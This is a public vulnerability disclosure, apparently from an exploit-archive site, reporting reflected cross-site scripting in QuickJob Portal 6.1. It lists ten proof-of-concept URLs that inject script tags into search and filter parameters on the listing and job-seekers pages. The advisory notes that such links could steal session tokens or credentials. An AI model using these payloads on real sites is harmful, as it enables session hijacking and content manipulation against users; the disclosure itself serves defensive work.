QuickJob Portal 6.1 Cross Site Scripting

2023-06-17 / 2023-06-18
Credit: CraCkEr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://quickjob.bylancer.com/ │ │ Vendor : Bylancer │ │ Software : QuickJob Portal 6.1 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /listing GET parameter 'keywords' is vulnerable to RXSS https://website/listing?keywords=tep81%3C%2ftitle%3E%3Cscript%3Ealert(1)%3C%2fscript%3Exjo44 Path: /listing GET parameter 'location' is vulnerable to RXSS https://website/listing?location=dlg48%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3eqlwm9 Path: /listing GET parameter 'filter' is vulnerable to RXSS https://website/listing?filter=mi7td%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Eqggg0 Path: /listing GET parameter 'sort' is vulnerable to RXSS https://website/listing?sort=Newestvxmqa%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Edxybf Path: /listing GET parameter 'order' is vulnerable to RXSS https://website/listing?order=DESCpmkh0%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Edsavh Path: /listing GET parameter 'custom%5B8%5D' is vulnerable to RXSS https://website/listing?keywords=&location=&placetype=&placeid=&cat=&subcat=&filter=&sort=Newest&order=DESC&job-type=4&salary-type=5&range1=11&range2=999&custom%5B8%5D=12b3r6d%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebojt4 Path: /job-seekers GET parameter 'age_range1' is vulnerable to RXSS https://website/job-seekers?age_range1=11grn6r%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ev1w8f Path: /job-seekers GET parameter 'age_range2' is vulnerable to RXSS https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999pkqe0%22%3e%3cscript%3ealert(1)%3c%2fscript%3evbpy9&range1=22&range2=33&gender=Male Path: /job-seekers GET parameter 'range1' is vulnerable to RXSS https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999&range1=22aafr9%22%3e%3cscript%3ealert(1)%3c%2fscript%3etdi3d&range2=33&gender=Male Path: /job-seekers GET parameter 'range2' is vulnerable to RXSS https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999&range1=22&range2=33onppz%22%3e%3cscript%3ealert(1)%3c%2fscript%3ee0x0x&gender=Male [-] Done


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top